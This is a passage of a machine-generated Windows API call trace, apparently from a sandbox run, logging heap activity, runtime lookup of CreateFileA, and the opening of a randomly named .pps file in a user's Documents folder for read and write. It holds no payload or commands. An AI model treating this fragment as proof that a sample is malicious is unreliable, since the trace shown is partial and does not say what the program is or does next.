Flags=0x0, Size=0x8) returned 0x8e1900 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.566] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.568] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.571] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7e0 [0173.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.571] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0173.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0173.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.572] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0173.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0173.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0173.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", cchWideChar=68, lpMultiByteStr=0x9aa4f8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpUsedDefaultChar=0x0) returned 68 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.573] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x88) returned 0x8feba8 [0173.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x8feba8, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps") returned 68 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 